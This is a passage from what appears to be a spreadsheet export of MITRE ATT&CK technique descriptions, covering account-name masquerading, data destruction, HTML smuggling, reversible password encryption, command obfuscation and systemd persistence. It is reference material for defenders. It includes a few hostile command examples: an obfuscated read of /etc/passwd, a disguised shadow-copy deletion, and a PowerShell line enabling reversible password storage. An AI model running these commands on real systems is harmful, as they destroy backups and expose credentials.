    <t>Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)
Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  
Note that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.
https://attack.mitre.org/techniques/T1036/010</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)
https://attack.mitre.org/techniques/T1200</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)
https://attack.mitre.org/techniques/T1505</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as &lt;code&gt;del&lt;/code&gt; and &lt;code&gt;rm&lt;/code&gt; often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)
https://attack.mitre.org/techniques/T1485</t>
  </si>
  <si>
    <t>T1132.002</t>
  </si>
  <si>
    <t>Non-Standard Encoding</t>
  </si>
  <si>
    <t>Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)
https://attack.mitre.org/techniques/T1132/002</t>
  </si>
  <si>
    <t>T1556.001</t>
  </si>
  <si>
    <t>Domain Controller Authentication</t>
  </si>
  <si>
    <t>Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts. 
Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
https://attack.mitre.org/techniques/T1556/001</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
A defender who is monitoring for large transfers to outside the cloud environment through normal file transfers or over command and control channels may not be watching for data transfers to another account within the same cloud provider. Such transfers may utilize existing cloud provider APIs and the internal address space of the cloud provider to blend into normal traffic or avoid data transfers over external network interfaces.(Citation: TLDRSec AWS Attacks)
Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018)
https://attack.mitre.org/techniques/T1537</t>
  </si>
  <si>
    <t>T1027.006</t>
  </si>
  <si>
    <t>HTML Smuggling</t>
  </si>
  <si>
    <t>Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as &lt;code&gt;text/plain&lt;/code&gt; and/or &lt;code&gt;text/html&lt;/code&gt;. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.
For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as &lt;code&gt;msSaveBlob&lt;/code&gt;.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)
https://attack.mitre.org/techniques/T1027/006</t>
  </si>
  <si>
    <t>T1556.005</t>
  </si>
  <si>
    <t>Reversible Encryption</t>
  </si>
  <si>
    <t>An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The &lt;code&gt;AllowReversiblePasswordEncryption&lt;/code&gt; property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (&lt;code&gt;G$RADIUSCHAP&lt;/code&gt;) from the Active Directory user-structure &lt;code&gt;userParameters&lt;/code&gt;
2. 16 byte randomly-generated value (&lt;code&gt;G$RADIUSCHAPKEY&lt;/code&gt;) also from &lt;code&gt;userParameters&lt;/code&gt;
3. Global LSA secret (&lt;code&gt;G$MSRADIUSCHAPKEY&lt;/code&gt;)
4. Static key hardcoded in the Remote Access Subauthentication DLL (&lt;code&gt;RASSFM.DLL&lt;/code&gt;)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to &lt;code&gt;Set-ADUser -AllowReversiblePasswordEncryption $true&lt;/code&gt;.
https://attack.mitre.org/techniques/T1556/005</t>
  </si>
  <si>
    <t>T1027.010</t>
  </si>
  <si>
    <t>Command Obfuscation</t>
  </si>
  <si>
    <t>Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev &lt;&lt;&lt;'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&amp;$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)
Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)
Tools such as &lt;code&gt;Invoke-Obfuscation&lt;/code&gt; and &lt;code&gt;Invoke-DOSfucation&lt;/code&gt; have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)
https://attack.mitre.org/techniques/T1027/010</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include &lt;code&gt;del&lt;/code&gt; on Windows and &lt;code&gt;rm&lt;/code&gt; or &lt;code&gt;unlink&lt;/code&gt; on Linux and macOS.
https://attack.mitre.org/techniques/T1070/004</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).
Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:
* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).
Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)
Typical drive-by compromise process:
1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.
Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.
Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
https://attack.mitre.org/techniques/T1189</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).
https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>T1651</t>
  </si>
  <si>
    <t>Cloud Administration Command</t>
  </si>
  <si>
    <t>Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)
https://attack.mitre.org/techniques/T1651</t>
  </si>
  <si>
    <t>T1546.016</t>
  </si>
  <si>
    <t>Installer Packages</t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.
For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)
https://attack.mitre.org/techniques/T1546/016</t>
  </si>
  <si>
    <t>T1595.001</t>
  </si>
  <si>
    <t>Scanning IP Blocks</t>
  </si>
  <si>
    <t>Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1595/001</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)
Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.
Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)
Adversaries may also modify the &lt;code&gt;*\template&lt;/code&gt; control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)
This technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)
https://attack.mitre.org/techniques/T1221</t>
  </si>
  <si>
    <t>T1037.004</t>
  </si>
  <si>
    <t>RC Scripts</t>
  </si>
  <si>
    <t>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to &lt;code&gt;rc.local&lt;/code&gt;, &lt;code&gt;rc.common&lt;/code&gt;, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
https://attack.mitre.org/techniques/T1037/004</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.
https://attack.mitre.org/techniques/T1134</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Multi-Factor Authentication Interception</t>
  </si>
  <si>
    <t>Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. 
If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)
Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)
Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)
https://attack.mitre.org/techniques/T1111</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
https://attack.mitre.org/techniques/T1027/002</t>
  </si>
  <si>
    <t>T1584.007</t>
  </si>
  <si>
    <t>Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 
Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS Apps Script Abuse 2021) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers - making it easier to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)
https://attack.mitre.org/techniques/T1584/007</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as HTTP/S(Citation: CrowdStrike Putter Panda) and WebSocket(Citation: Brazking-Websockets) that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
https://attack.mitre.org/techniques/T1071/001</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking )
https://attack.mitre.org/techniques/T1059/005</t>
  </si>
  <si>
    <t>T1564.005</t>
  </si>
  <si>
    <t>Hidden File System</t>
  </si>
  <si>
    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)
https://attack.mitre.org/techniques/T1564/005</t>
  </si>
  <si>
    <t>T1543.002</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.  
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) 
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)  
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts. 
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.  
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) 
